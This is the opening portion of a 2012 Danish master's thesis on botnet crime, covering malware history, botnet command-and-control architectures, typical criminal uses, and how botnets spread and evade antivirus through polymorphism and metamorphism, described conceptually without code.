1. No category

IT-KRIMINALITET MED
FOKUS PÅ BOTNETS
Kandidatspeciale af
Daniel Jovanovic
IT-Universitetet
København, Forår 2012
Vejleder: Freddie Drewsen
Abstract
A botnet is a specific kind of malware which compromise several computers and
enroll them into a distributed network. These bots can then be commandeered into
performing several kinds of criminal activities.
This thesis confirms that botnets have been used in financial crimes gaining large
amounts of money to the botmasters. Examples show that botnets have been used to
threaten victims with distributed denial of service attacks, forcing them to pay a
ransom. Another example describes how botnets is used to obtain online banking
information from victims through keylogging, consequently robbing their accounts.
Furthermore this thesis confirms that botnets have been used in an ideological fashion,
referred to as hacktivism. In this case botmasters wish to create awareness of a
specific topic and possibly force a political change by using malware and hacking.
Finally, this thesis describes how botnets have evolved into a tool that can be used in
cyber warfare between nations. Examples show that an enemy’s critical infrastructure
can be taken down by the use of distributed denial of service attacks from botnets.
By law these kind of criminal activities have been deemed illegal and are punishable.
But because botnets usually span over many countries, which may complicate
individual nations investigations, this thesis recommends that a global internet police
should be formed. This unit should have the necessary authority to effectively fight
botnets globally. Since such a recommendation might be a long term solution this
thesis also describes technical tools as well as other procedures, which can be used to
mitigate the threat from botnets and malware in general.
Daniel Jovanovic
2
Indholdsfortegnelse
Kapitel 1. Introduktion ............................................................................. 5
1.1
Indledning ......................................................................................................... 5
1.2
Problemstilling ................................................................................................... 5
1.3
Problemformulering ............................................................................................ 6
1.4
Metode.............................................................................................................. 6
1.5
Læsevejledning .................................................................................................. 6
Kapitel 2. Baggrund ................................................................................. 8
2.1
Hvad er it-sikkerhed ........................................................................................... 8
2.2
Hvad er malware ................................................................................................ 9
2.3
Hvad er et botnet ............................................................................................. 10
Kapitel 3. Botnet-teknologi ......................................................................11
3.1
Botnet-arkitektur.............................................................................................. 11
3.1.1
Centraliserede botnets................................................................................. 11
3.1.2
Decentraliserede botnets ............................................................................. 13
3.1.3
Andre arkitekturformer ................................................................................ 14
3.2
Anvendelsesmuligheder ..................................................................................... 14
3.3
Spredning og inficering ..................................................................................... 15
3.4
Opbygning samt livscyklus ................................................................................ 19
3.5
Hvordan beskytter botnet sig selv ...................................................................... 21
Kapitel 4. Kriminalitet og botnets .............................................................23
4.1
Botnets kriminelle udvikling ............................................................................... 23
4.2
Berigelsesforbrydelser ....................................................................................... 25
4.3
Hacktivism ...................................................................................................... 28
4.4
Cyber warfare .................................................................................................. 29
4.5
Sammenfatning................................................................................................ 31
Kapitel 5. Case: ZeuS Crimeware Toolkit ...................................................32
5.1
Hands-on med ZeuS Crimeware Toolkit ............................................................... 32
5.2
Hypotese om forretningsmodel ........................................................................... 36
5.3
Sammenfatning................................................................................................ 39
ITU
3
Kapitel 6. Hvad kan man gøre ..................................................................40
6.1
Lovgivning ....................................................................................................... 40
6.1.1
Danmark ................................................................................................... 40
6.1.2
USA og Storbritannien ................................................................................. 43
6.1.3
Botnets som et globalt problem .................................................................... 44
6.2
It-beredskabsplaner.......................................................................................... 45
6.3
Walled Garden ................................................................................................. 46
6.4
Cyber Clean Center i Japan ................................................................................ 46
6.5
Skabe awareness om it-sikkerhed ...................................................................... 47
6.6
Tekniske værktøjer mod botnets ........................................................................ 51
6.6.1
Intrusion Detection and Prevention System .................................................... 51
6.6.2
Antivirus .................................................................................................... 53
6.6.3
Firewall ..................................................................................................... 54
6.6.4
Honeypot ................................................................................................... 55
6.6.5
Udfordringer med ovenstående værktøjer ...................................................... 56
6.7
Hvad skal man gøre under angreb ...................................................................... 57
6.8
Sammenfatning................................................................................................ 58
Kapitel 7. Hvem har ansvaret ..................................................................59
Kapitel 8. Konklusion ..............................................................................62
Kapitel 9. Perspektivering........................................................................64
Appendiks .............................................................................................66
10.1 Kildehenvisning ................................................................................................ 66
10.2 Figurliste ......................................................................................................... 68
10.3 Spørgsmål til TDCHosting.dk .............................................................................. 69
10.4 Skærmbillede af ZeuS database ......................................................................... 69
10.5 Uddrag fra ZeuS Crimeware Toolkit manual ......................................................... 70
10.6 ZeuS konfigurationsfiler .................................................................................... 71
10.7 Designfejl, skriv dit password her ....................................................................... 72
10.8 Cyber Theft Ring .............................................................................................. 73
Daniel Jovanovic
4
Kapitel 1
Introduktion
1.1 Indledning
Internettet har ført mange succeshistorier med sig. Det er et eksistensgrundlag for flere
virksomheder samt forretninger, og det forenkler hverdagen for digitale borgere igennem
tjenester som webbank og e-mailkommunikation. Internettet fører dog også ondsindede
gerninger med sig. Grundet internettets mange muligheder, kan det også anvendes til
kriminelle gøremål. Siden de første ondsindede programmer med skadelig effekt kom i
1980’erne, har en udvikling taget de kriminelle handlinger til et stadigt stigende niveau. Disse
handlinger udnytter internettet som platform og benyttes til flere forskellige former for
kriminalitet.
Som i den fysiske verden forsøges denne kriminalitet at blive opsporet og bekæmpet. Dette
har gjort it-sikkerhed til en kundskab, som er specielt vigtig i forbindelse med internettet for at
beskytte både borgere, virksomheder og nationer. Der udvikles værktøjer med beskyttende
formål, som herefter forsøges penetreret af ondsindede personer. Denne magtbalance
resulterer i en evig kamp mellem sikkerhedsproducenter og hackere.
1.2 Problemstilling
Malware må efterhånden betragtes som et glimrende værktøj for kriminelle, der ikke kun
ønsker at udføre hærværk, men også søger økonomisk vinding deraf. En bestemt anvendelsesmulighed af malware, kaldet botnets, er en samling af inficerede computere, der står fuldt ud
til rådighed for bagmændene. Det formodes, at sådanne distribuerede systemer anvendes
både til sabotage og økonomisk kriminalitet, hvilket antages at være en yderst indbringende
industri for bagmændene. Dette udgør en trussel på flere niveauer, både for private personer,
virksomheder samt hele nationer. Botnets som værktøj for kriminelle er derfor et fokuspunkt,
der skal tages yderst seriøst, og bekæmpelsesmuligheder skal undersøges og konkretiseres.
Dette speciale ønsker at redegøre for denne form for kriminalitet samt hvordan den forsøges
bekæmpet.
ITU
5
1.3 Problemformulering
Specialet ønsker at undersøge disse såkaldte botnets, samt analysere hvordan disse anvendes
til kriminelle gøremål. Derudover undersøges der, hvorledes man kan beskytte sig imod disse.
Dette giver anledning til følgende analysespørgsmål:

Hvordan ser det tekniske grundlag ud for botnets?

Hvordan bidrager botnets til kriminalitet?

Hvordan kan botnets spores og forhindres?
1.4 Metode
Specialet benytter litteratur i form af både videnskabelige artikler, kilder fra internettet samt
nogle udvalgte grundbøger til at svare på problemformuleringen. Hvor de videnskabelige
artikler samt kilderne fra internettet er med til at give forståelse for emnet, sørger grundbøgerne for en grundlæggende viden om de tre vigtige områder under e-business: Teknologi,
business og policy/jura.
For at opnå en forståelse for botnets opbygning samt funktionalitet, er der i forbindelse med
specialet udarbejdet et abstrakt eksempel på et botnet skrevet i pseudokode. Dette har
bidraget til at identificere, hvilke områder der er interessante i forhold til specialet og dermed
it-kriminalitet.
Derudover har der været afholdt et interview med en dansk ekspert på området, Shehzad
Ahmad fra organisationen DK-CERT, som har bekræftet specialets aktualitet samt dannet
grundlag for de antagelser, der eventuelt gøres i specialet. Der er desuden, uden held, forsøgt
etableret en mailkorrespondance med TDC Hosting, se appendiks 10.3. Dette er forsøgt gjort
for at få indblik i hvordan deres kunder beskyttes mod denne form for it-kriminalitet.
1.5 Læsevejledning
Resten af rapporten er delt op i kapitler, med fokus på at skabe en rød tråd igennem specialet.
Kapitlerne er som følger:
Kapitel 2. Baggrund. Her beskrives, hvad der forstås ved it-sikkerhed, malware og
botnets. Formålet er at danne et fundament, som resten af specialet kan tage
udgangspunkt i.
Daniel Jovanovic
6
Kapitel 3. Botnet-teknologi. Dette kapitel går i dybden med botnets, og den
teknologi det bygger på. Herunder beskrives de forskellige arkitekturformer,
anvendelsesmuligheder, samt hvordan botnet spreder og beskytter sig selv. Derudover
udarbejdes et eksempel på et botnet i pseudokode for at give en overordnet forståelse
for opbygningen.
Kapitel 4. Kriminalitet og botnets. Her beskrives, hvordan botnets anvendes til
kriminalitet. Kapitlet indledes med en redegørelse for botnets kriminelle udvikling og
herefter en analyse af botnets funktion i forbindelse med tre overordnede kriminelle
hensigter.
Kapitel 5. Case: ZeuS Crimeware Toolkit. Dette kapitel analyserer et specifikt
botnet og dets tilhørende Crimeware Toolkit. Implementeringen af botnettet
undersøges i et virtuelt miljø, og skærmbilleder dokumenterer den brugervenlighed,
kriminelle møder under opsætningen. Der opstilles en hypotese angående ZeuS’
forretningsmodel, som herefter forsøges begrundet i empiri.
Kapitel 6. Hvad kan man gøre. Kapitlet indledes med en undersøgelse af
lovgivningen, for at se om den dækker botnet-kriminalitet. Herefter beskrives andre
tiltag og procedurer, der bidrager til botnet-bekæmpelse. Sidst analyseres hvilke
tekniske værktøjer der eksisterer, og hvordan de kan anvendes imod botnets.
Kapitel 7. Hvem har ansvaret. Dette kapitel analyserer, hvem der har et ansvar for
at mindske truslen fra botnet-kriminalitet, samt hvordan. Flere instanser beskrives, da
der kan placeres forskellige ansvarspunkter hos alle internettets interessenter.
Kapitel 8. Konklusion. Specialet afsluttes med en konklusion, der summerer de
vigtigste pointer og dermed svarer på problemformuleringen.
Kapitel 9. Perspektivering. Her beskrives specialet i en mere overordnet
sammenhæng med omverdenen, og det belyses hvordan resultatet kan hjælpe
fremtidig botnet-bekæmpelse.
Grundet specialets tekniske karakter med dertilhørende tekniske fagtermer, forekommer der i
denne rapport engelske udtryk for ikke at ødelægge forståelsen med danske oversættelser. For
så vidt muligt er der benyttet de termer og begreber, der bruges i både dansk og international
litteratur.
ITU
7
Kapitel 2
Baggrund
2.1 Hvad er it-sikkerhed
Vores hverdag bliver i stigende grad mere og mere digital og online, både i forbindelse med
erhvervs- og privatlivet. I takt med at vigtige og personlige informationer lagres digitalt,
opstår der et behov for at kunne beskytte alle sine elektroniske værdier. Dette er itsikkerhedens opgave. Overordnet set kan it-sikkerhed nedbrydes til have tre overordnede mål
for beskyttelse, også kendt som CIA: Confidentiality, Integrity og Availability, oversat til
fortrolighed, integritet og tilgængelighed. Ethvert af disse mål skal være med til at beskytte de
værdier, der måtte være, mod de trusler der eksisterer. Et scenarie kan skitseres som
følgende:
Figur 1. It-relaterede værdier og trusler.
Der eksisterer altså et behov for at sikre sine værdier mod trusler af enhver art. Der findes en
række modmidler og beskyttende værktøjer, der kan hjælpe til at overholde disse
beskyttelsesmål. Det er dog urealistisk at forestille sig, at sådanne modmidler er 100 pct.
sikre, og det vil være meget svært at gardere sig imod de fejl og mangler, der eksisterer i for
eksempel software. Derfor vil der i forsvaret af værdierne være nogle sårbarheder, som vil
kunne blive udnyttet af personer med ondsindede motiver. Disse hackere kan blandt andet
udnytte sårbarhederne ved at udvikle malicious software, som i daglig tale kaldes malware.
Daniel Jovanovic
8
2.2 Hvad er malware
I forbindelse med it-sikkerhed kan malware defineres som: “Software which is used with the
aim of attempting to breach a computer system’s security policy with respect to
Confidentiality, Integrity or Availability” [7]. I denne forbindelse skal software forstås som alle
former for eksekverbar kode, scripts, macros og lignende, hvis formål er at bryde
fortroligheden, integriteten og tilgængeligheden af ofrenes computere, netværk eller software.
Malware har eksisteret længe og har udviklet sig betydeligt over tid. Begyndelsen af denne
udvikling kan diskuteres, men allerede i 1974 blev en simpel selvreplikerende kode udviklet og
demonstreret af Xerox i deres laboratorium [8]. Dette blev betragtet som den første af sin
slags. Efterfølgende sås Elk Cloner-virussen fra 1981, som blev anset som værende den første
egentlige computervirus. Denne var designet til Apple II-systemer og var en såkaldt boot
sektor-virus, der placerede sig i boot sektoren under opstart fra en inficeret floppydisk. Med
tiden kom flere varianter, og i 1986 kom den første virus, Brain virussen, der gjorde skade på
de inficerede computere [8]. Denne virus flyttede den oprindelige boot sektor til et andet sted
på floppydisken og erstattede den med virussen. Senere, i 1988, blev den første computerorm opdaget, kaldet Morris Worm, som spredte sig via internettet. Skønt dette ikke var
formålet, skabte ormen et Denial of Service angreb på grund af, at spredningen af ormen
blandt andet udnyttede så mange CPU-ressourcer på de inficerede computere til at finde
passwords ved hjælp af Brute Force. Udvikleren, Robert Morris, blev som den første malwaredesigner idømt tre års betinget fængsel, samt 400 timers samfundsarbejde og en bøde på
$10.000 [27]. Malware-designere havde tidligt opdaget muligheden for at tjene penge ved
hjælp af malware og i 1989 kom AIDS-trojanen, som skjulte sig i øjensynlige harmløse
programmer på disketter, der ved eksekvering krypterede offerets harddisk. Bagmanden
forlangte derefter penge for at udlevere vaccinen, dog uden videre succes, så ofrene kunne
gendanne deres harddisk.
Udviklingen fortsatte og omkring år 2000 og derefter, opdagede malware-designere, at
kombination af flere malware-varianter kunne udnyttes til nemmere at tjene penge [8]. Man
udviklede sofistikeret malware, der ved hjælp af etablerede infrastrukturer kunne
kommanderes til at udføre opgaver som spam, phishing, Denial of Service, osv. Det viste sig,
at der var et marked for dette koncept, og der blev derfor udviklet nye varianter og stadigt
bedre versioner af denne form for infrastruktur, som kunne true internetbrugere og benyttes til
kriminelle handlinger. Disse blev kaldt for botnets.
ITU
9
2.3 Hvad er et botnet
I forbindelse med dette speciale defineres et botnet som: “a pool of compromised computers
that are under the command of a single hacker, or a small group of hackers, known as a
botmaster. A bot refers to a compromised end-host, or a computer, which is a member of a
botnet.” [14]. Overordnet set er et botnet altså en samling af inficerede computere, kaldet
bots, som alle kan kontrolleres af den såkaldte botmaster. Dette kan skitseres som følgende:
Figur 2. Abstrakt botnet.
Et botnet kan anses som værende en hybrid mellem mange af de trusler, man tidligere har set
på it-området. Botnets kan gemme sig som vira og trojanske heste, sprede sig som orme, give
fjernkontrol til hackere via bagdøre samt benytte automatiserede og sofistikerede angrebsværktøjer. Alt dette styret ved hjælp af et “Command and Control”-system, hvor en hacker
trygt kan gemme sig bag.
Botmasteren kan benytte den tilegnede fjernkontrol til at udstede kommandoer til alle de bots
der er blevet smittet, og som nu er en del af botnettet. Disse kommandoer kan variere, men
som oftest drejer det sig om udsendelsen af spam-mails, informationsindsamling, Distributed
Denial of Service-angreb, eller at finde og smitte nye computere til botnettet. Disse botnets
kan være af forskellige størrelser, fra små botnet til større, som for eksempel ZeuS med mere
end 3 millioner bots alene i USA [19].
Konceptet bag botnets har eksisteret siden 1999, men har gennemgået en markant udvikling i
forhold til brugen af dem samt de ressourcer der står bag dem [14]. Botnets må siges at have
modnet sig siden sin start, og de er gået fra primært at ligge i den ene ende af det kriminelle
spektrum til nu at ligge bredt henover hele spektret. I dag anvendes de i forskellige kriminelle
henseender med vidt forskellige formål. Dette beskrives senere i specialet, se kapitel 4.
Daniel Jovanovic
10
Kapitel 3
Botnet-teknologi
Dette kapitel går i dybden med begrebet botnets. Da specialet søger at beskrive samt afdække
it-kriminalitet med hensyn til botnets, er det vigtigt med en gennemgående forståelse for
hvorledes de er bygget op og fungerer. Kapitlet vil dermed beskrive de mest almindelige
former for arkitekturprincipper bag botnets, samt hvordan de fungerer i forhold til inficering og
spredning. Herefter beskrives opbygningen af et abstrakt botnet med tilhørende funktioner i
pseudokode, samt hvordan et botnets livscyklus kunne se ud. Kapitlet slutter af med at
beskrive, hvorledes botnet-bagmænd forsøger at beskytte deres botnet mod de trusler der
måtte eksistere.
3.1 Botnet-arkitektur
Der eksisterer to overordnede arkitekturmodeller indenfor botnet-opbygning, centraliserede
botnets og decentraliserede botnets. Hver af disse bygger på forskellige principper og har
dermed også hver deres fordele og ulemper. Derudover kan disse varieres eller kombineres til
andre arkitekturformer.
3.1.1 Centraliserede botnets
Centraliserede botnets anses som værende den oprindelige arkitekturmodel i de første botnets
der kom frem [7]. Arkitekturen bygger på det klassiske client-server koncept, med én
centraliseret server og en række dertilhørende klienter, i dette tilfælde bots. De enkelte bots
kommunikerer kun med serveren, her kaldet en Command and Control-server eller C&Cserver, for at modtage de kommandoer, der ønskes udført. C&C-serveren kan også være en
bot, som blot skal have en tilstrækkelig høj båndbredde til at kunne kommunikere ubesværet
med resten af botnettet [14].
Af hensyn til botmasterens sikkerhed foregår opsætning og kommunikation mellem botmaster
og C&C-serveren oftest igennem flere proxy’er, så sporingen tilbage til botmaster besværliggøres. Disse proxy’er vil som oftest blot være bots fra botnettet, der egner sig til formålet.
Proxy’erne kan eventuelt lede trafikken igennem flere lande og dermed igennem flere
ITU
11
jurisdiktioner, som gør det juridisk problematisk at spore og afbryde forbindelsen til C&Cserveren. Et centraliseret botnet kan opbygges på følgende måde:
Figur 3. Opbygning af et centraliseret botnet.
Så snart en ny computer er inficeret med botnet-malwaren, opretter computeren forbindelse
med C&C-serveren og udfører de eventuelle handlinger, der er påkrævet, inden computeren
kan fungere som bot. Herefter er botnet-malwaren på de inficerede computere udarbejdet
således, at de lytter efter botmasterens kommandoer på C&C-serveren. I begyndelsen
benyttede botnet-designere IRC-servere som kanal til at udsende kommandoerne [14]. Men
eftersom botnet-bekæmpere blev bedre til at identificere denne trafik, kan det nu også foregå
på andre kanaler, som er sværere at filtrere og identificere, såsom HTTP-trafik, for eksempel
igennem Facebook eller Twitter, eller krypteret igennem SSL.
Denne arkitekturform har en række fordele i forhold til decentraliserede botnets. Da C&Cserveren er centraliseret, kan denne ene server drive alle bots ensartet og effektivt. Derudover
vil der eksistere en lav latenstid mellem serveren og de inficerede computere, hvilket giver god
mulighed for at koordinere botnettet og præcisere distribuerede angreb. Til gengæld har
arkitekturen en kritisk ulempe i forhold til decentraliserede botnets. Da al koordinering samt
kommunikation mellem botmasteren og botnettet foregår på den centraliserede C&C-server,
introducerer dette en såkaldt single-point-of-failure. Sagt med andre ord: Hvis det lykkes at
opspore og afbryde forbindelsen til C&C-serveren, vil botnettet være afvæbnet, medmindre
botnet-designeren har taget de nødvendige forholdsregler for at undgå dette.
Daniel Jovanovic
12
3.1.2 Decentraliserede botnets
For at forstærke botnets modstandsdygtighed samt vanskeliggøre afvæbningen, kan botnetdesignere gøre brug af decentraliserede botnets, der bygger på peer-to-peer princippet. Dette
princip er oftest kendt fra diverse fildelingstjenester, hvor alle parter kan kommunikere
indbyrdes med hinanden. I forbindelse med decentraliserede botnets eksisterer der flere
backend-servere, som alle kan distribuere og udsende C&C-trafik. Dette vil sige, at i
modsætning til centraliserede botnets kan decentraliserede botnets holde sig i live, selvom det
skulle lykkes at få lukket en eller flere backend-servere. Et decentraliseret botnet kan
opbygges som følgende:
Figur 4. Opbygning af et decentraliseret botnet.
Et botnet der benytter denne form for infrastruktur, vil oftest være opdelt i tre lag. Øverst
eksisterer en række backend-servere, der genererer den trafik af kommandoer, der skal
eksekveres. Denne kommunikation foretages igennem en række proxy’er, der udgør det
midterste lag, ned til det sidste lag, som er de egentlige bots. Al kommunikation bør foregå
igennem flere proxy’er, således at en eventuel sporing af backend-serverne besværliggøres. I
begge arkitekturer kan alle lag i øvrigt bestå af computere der er blevet inficeret og nu er bots,
såfremt de opfylder de nødvendige krav for at kunne fungere som ønsket
Denne tilgang til botnet-arkitektur medfører også en række fordele og ulemper i forhold til et
centraliseret botnet. Fordelen er, som tidligere nævnt, at arkitekturtypen gør det meget svært
at lukke ned for botnettet. Selvom en eller flere af serverne opspores og forbindelsen til disse
afbrydes, så vil botnettets andre backend-servere, proxy’er og medlemmer stadig kunne
ITU
13
kommunikere indbyrdes og sørge for at sende kommandoerne rundt til de andre parter. Dette
introducerer dog også en stor ulempe, nemlig usikkerhed i kommunikationen. Med denne
arkitekturmodel er der ingen garanti, for at kommandoerne kommer frem til alle parter på en
ensartet facon, samt at der ikke kan garanteres en fornuftig latenstid på spredningen af
kommandoerne. Dermed kan det være sværere at koordinere angreb eller andre handlinger
med et decentraliseret botnet.
3.1.3 Andre arkitekturformer
Botnets følger ikke nødvendigvis ovenstående arkitekturformer til punkt og prikke, men kan
varieres efter botnet-designerens eget ønske. Ovenstående arkitekturer kan eventuelt
kombineres på flere måder for at opnå nye arkitekturformer. Derudover kunne man også
forestille sig botnets uden en egentlig struktur, hvor hver enkelt bot ikke kender opbygningen
eller andre bots. Kommunikationen kunne fungere ved, at beskeder til bots krypteres og
sendes tilfældigt ud på internettet. Kun medlemmer af botnettet vil være i stand til at
dekryptere og forstå beskeden og dermed udføre kommandoen. Et sådant botnet vil være
yderst modstandsdygtigt, da kompromittering af en eller flere bots ikke ville kunne nedlægge
botnettet. Dog eksisterer samme ulempe som med et decentraliseret botnet, at der ikke kan
garanteres, at beskeder når lige hurtigt frem eller overhovedet når alle bots.
3.2 Anvendelsesmuligheder
På grund af botnets opbygning ses en række typiske anvendelsesmuligheder, der alle udnytter,
at botnet-bagmændene har en distribueret gruppe af inficerede computere til rådighed.
Overordnet set drejer det sig for botnet-bagmændene om, at skaffe sig adgang til en stor
mængde ressourcer i form af computerkraft. Dette giver åbenlyse anvendelsesmuligheder for
botnets, men de mest sete og omtalte må siges at være udsendelsen af spam-mails,
informationsindsamling, Distributed Denial of Service-angreb, herefter DDoS-angreb, og
naturligvis muligheden for at sprede sig selv til nye potentielle botnet-medlemmer.
Udsendelsen af spam-mails blev attraktivt for botnet-bagmænd, fordi disse nu kunne anvende
botnet-medlemmernes ressourcer til at sende spam. Dermed kunne de undgå at benytte egne
computere og mailservere, hvilket mindskede risikoen for at blive opdaget og retsforfulgt.
Disse spam-mails mål kan være forskellige, men et eksempel kan være at skabe en økonomisk
gevinst ved at reklamere for produkter, der ønskes solgt. Da spam-mails kan udsendes til flere
millioner mailadresser, kræves det kun, at en lille procentdel af disse modtagere køber de
reklamerede produkter for at skabe en gevinst, hvilket derfor kan være en lukrativ forretning.
Daniel Jovanovic
14
Det ses også at spam kan være en kanal til inficering af potentielle ofres computere, ved hjælp
af phishing eller anden form for malware.
Formålet med at inficere computere med botnet-malware ved, for eksempel, at få ofrene til at
trykke på links i spam-mails eller eksekvere anden form for malware ubevidst, kan være at
foretage informationsindsamling fra de inficerede computere. Denne informationsindsamling vil
typisk fokusere på at tilegne sig brugernavne og adgangskoder til diverse internettjenester,
som for eksempel til e-mail og webbank. Disse informationer kan senere udnyttes til at sende
spam-mails til nye mål eller i tilfælde af webbank at stjæle penge fra ofrene.
Botnet er også kendt for at kunne bruges som et decideret offensivt angrebsværktøj til
udførelse af DDoS-angreb. Grundet konceptet med at botnet-medlemmerne kan kommanderes
til at udføre samme handling, kan man opnå en meget stor computerkapacitet. Kontrolleres
dette fra centralt hold, kan botnet-bagmændene udføre et distribueret angreb mod et enkelt
mål som kan resultere i manglende tilgængelighed for de brugere, der har et berettiget formål
med at tilgå for eksempel en hjemmeside.
Det ses altså, at der kan eksistere flydende overgange mellem de forskellige typer af botnet,
og at der dermed kan findes elementer af flere typer i ét botnet. Man kan forestille sig at
nutidens botnet-bagmænd næppe er interesseret i at deres botnet kun udfører én specifik
opgave, men at de sandsynligvis forsøger at udnytte botnettet mest muligt. I tilfælde af at
botnettet ønskes lejet ud, vil botnet-bagmændene sikkert også være interesseret i at kunne
tilbyde deres kunder mest muligt. Så selvom forskellige botnets fokuserer på én type opgave,
er det sandsynligt at der også eksisterer elementer fra andre typer botnets. Eksempelvis
antages det, at alle botnets på en eller anden måde ønsker at sprede sig selv og inficere nye
ofre, hvilket derfor ses som et fællestræk for botnets generelt.
3.3 Spredning og inficering
Da botnets kan anses som værende hybrider mellem flere varianter af malware, er det
naturligt at beskrive spredningen og inficeringen af malware generelt. Som tidligere nævnt kan
de fleste botnets sprede sig som orme. En orm består typisk af tre elementer: Searcher,
Propagator og Payload [7]. Seacherens opgave er at finde nye mål for spredningen, for
eksempel ved at ormen undersøger den aktuelle computer for potentielle mål. Dette kunne
være baseret på information, som er gemt lokalt på computeren, for eksempel kontaktpersoner i et e-mailprogram eller anden form for instant messaging klient. Searcheren kunne
eventuelt også kigge i andre filer af typen txt, html, xml eller php for at finde e-mailadresser.
ITU
15
Derudover vil en Searchers opgave også kunne ligge i, at finde potentielle mål på det netværk
computeren er tilknyttet, ultimativt på hele internettet. Denne eventuelle tilfældige tilgang vil
oftest ske igennem en portscanning, da spredning via denne kanal vil kræve en åben port ind
til offerets computer. Da denne form for netværksaktivitet er usædvanlig, er der udviklet
forskellige metoder til at detektere denne trafik og eventuelt blokere den [7].
Når de potentielle mål er fundet, er det Propagatorens rolle at udføre den handling, der skal
forsøge at inficere ofrenes computere. Dette kunne typisk være via e-mail, hvor man anvender
de fundne e-mailadresser til at sende vedhæftet malware eller links til hjemmesider, hvor de
downloades fra. Fordelen for botnet-designere i dette tilfælde er, at hvis den aktuelle e-mailadresse fra den inficerede computer anvendes til at sende botnet-malwaren ud til de kontaktpersoner vedkommende måtte have, vil ofrene eventuelt have et tillidsforhold og dermed være
tilbøjelig til ikke at vurdere risikoen ved at åbne en vedhæftet fil eller trykke på et link.
Dermed øges botnet-designeres chance for at få spredt ormen via e-mail. Alternativt kan
ormen sprede sig via et netværk ved hjælp af TCP eller UDP socket kommunikation, hvor
offerets computer har en åben port ind til eksempelvis en applikation eller service med en
sårbarhed, der kan udnyttes.
Hvis ormen er kommet igennem og nu ligger på offerets computer, kan Payload eksekveres.
Historisk er der set eksempler på orme uden payload, samt orme med payloads der ikke er
designet til at skade offeret. Eksempler på disse er Slammer-ormen fra 2003, der endte med
at bruge så meget båndbredde og netværksressourcer på at sprede sig, at det resulterede i et
DoS [7]. Et eksempel på en fredelig orm fra starten af 1980’erne er ormen, som blev udviklet
ved Xerox Palo Alto Research Center. Denne skulle identificere, hvilke computere der ikke blev
anvendt i øjeblikket og derefter distribuere arbejdsopgaver ud til de enkelte computere til
eksekvering, altså en tidlig form for grid computing [7]. Payload kan naturligvis også være
yderst skadelig og udgøre en trussel. En orms opgave kunne for eksempel være at sprede et
botnet, og payload kunne dermed være den kode, der ved eksekvering tilføjer en computer til
et botnet.
Antages det, at et botnet forsøger at sprede sig via e-mail, og at et offer åbner en eksekverbar
fil fra samme e-mail, vil et antivirus-program, som er installeret på offerets computer,
eventuelt opfange den skadelige kode. Anvendes eksempelvis et antivirus-program med en
signatur-baseret detekteringsmekanisme, vil denne stoppe inficeringen, hvis botnet-kildekoden
er velkendt og tilføjet i en central signaturdatabase. Malware-designere forsøger derfor at
omgå dette med specielt to mekanismer for at skjule den skadelige effekt, polymorphism og
metamorphism.
Daniel Jovanovic
16
Med polymorphism anvendes eksempelvis kryptering til at differentiere malwaren. Her
udnyttes, at samme plaintext vil krypteres til forskellige ciphertext med forskellige nøgler.
Dette kan altså udnyttes til, at samme malware kan have forskellige signaturer og dermed ikke
nødvendigvis vil blive stoppet af antivirus-programmer. Dekrypteringsalgoritmen samt nøglen
vil dog blive nødt til at være indsat et sted i koden i klartekst for at kunne dekryptere
malwaren inden eksekvering. Dette resulterer i, at der stadig vil eksistere et mønster i koden,
da dekrypteringsalgoritmen altid vil være ens for flere versioner af malwaren, og den vil derfor
eventuelt stadig kunne findes ved hjælp af signaturbaseret detektering. Det er dog stadig et
godt værktøj for malware-designere, da kvaliteten af antivirus-programmer er meget
varierende og i nogle tilfælde ikke vil kunne blive opdaget.
Den anden tilgang, metamorphism, er en metode, hvor malwaren får indsat ligegyldig kode i
den oprindelige kildekode for at få indholdet til at se forskelligt ud. Et eksempel er som følger:
Figur 5. Eksempel på metamorphism af en maskinkode. Kilde [7].
Som man kan se på ovenstående eksempel i maskinkode, hvor koden til venstre er den
oprindelige kode, og koden til højre er den ændrede variant, er der indsat både jumpkommandoer markeret med rød og ligegyldig kode markeret med blåt. Følges koden nøje, ses
det, at funktionaliteten er den sammen mellem de to varianter. Det ses for eksempel, at der er
indsat null operations, nop, og at registret, eax, tælles én op og derefter én ned, altså uden
ændringer på den oprindelige kode. En malware der benytter denne teknik, kan eventuelt
ITU
17
programmeres til at ændre denne ligegyldige kode, for hver gang den spreder sig selv, og
dermed gøre den svær at detektere. Både polymorphism samt metamorphism er med til at
skjule den skadelige kode fra signaturbaserede antivirus-programmer, således at ofrene i
første omgang kan blive udsat for spredningen og dermed risikere at blive medlem af
botnettet.
Generelt har man set en ændring for spredningen af botnets fra at være baseret på tilfældige
udvalgte mål til at angribe mere målrettet [15]. Dette kunne for eksempel være via lister over
kontaktpersoner fra e-mail, sociale netværk eller lignende, som menes at give en større
chance for spredningssucces, eller nøje udvalgte mål som på en eller anden måde er ønskværdige mål for botnet-bagmændene. Denne generelle udvikling og tendens følges af, at
botnets, og malware generelt, er gået fra at sprede sig via sårbarheder i operativsystemer til
også at angribe sårbare services og nu i højere grad at angribe sårbare applikationer samt
mennesker ved hjælp af Social Engineering [15]. Dette kan skyldes, at der på dette
abstraktionsniveau vurderes en større chance for spredningssucces, da de etablerede tekniske
modmidler og værktøjer har sværere ved at detektere og forhindre skadelige hændelser
igennem eksempelvis HTTP trafik eller direkte fra legale brugere grundet Social Engineering.
Figur 6. Tabel over spredningsmekanismer. Kilde [15].
Som man kan se på ovenstående tabel, er angreb på applikationsniveau hurtigere til at sprede
sig og samtidig sværere at opdage og dermed at forhindre, hvorimod angreb på eksempelvis
operativsystem-niveau er nemmere at opdage og i øvrigt spreder sig langsomt. Dette skyldes,
at der i stigende grad bliver udviklet nye og effektive værktøjer, der beskytter computere og
netværk mod angreb på lavere lag, såsom operativsystemer og services. Sådanne værktøjer
er knap så effektive på højere niveauer, hvor sårbarheder udnyttes i programmer som Flash
Player og Adobe Reader til at inficere brugere, hvor det skadelige indhold kan være svært at
detektere. Mod Social Engineering er det ligeledes svært at beskytte sig, da menneskers
godtroenhed udnyttes af hackere til at få offeret til selv at initiere den skadelige handling og
dermed omgå de eventuelle beskyttende modmidler. Derfor vil inficeringen via Social
Engineering ikke nødvendigvis gå særlig hurtigt, men til gengæld kan hackeren ramme et
bredt omfang af mennesker og systemer, også dem der umiddelbart er beskyttet af tekniske
værktøjer.
Daniel Jovanovic
18
3.4 Opbygning samt livscyklus
Et botnet kan i teorien opbygges og drives simpelt, idet det kun behøver bestå af få elementer.
For at beskrive disse elementer, udarbejdes i dette afsnit et eksempel på et botnet samt dets
eventuelle livscyklus i pseudokode. I første omgang fokuseres der udelukkende, på hvor
simpelt et botnet kan opbygges, og der tages ikke højde for truslen fra botnet-bekæmpere.
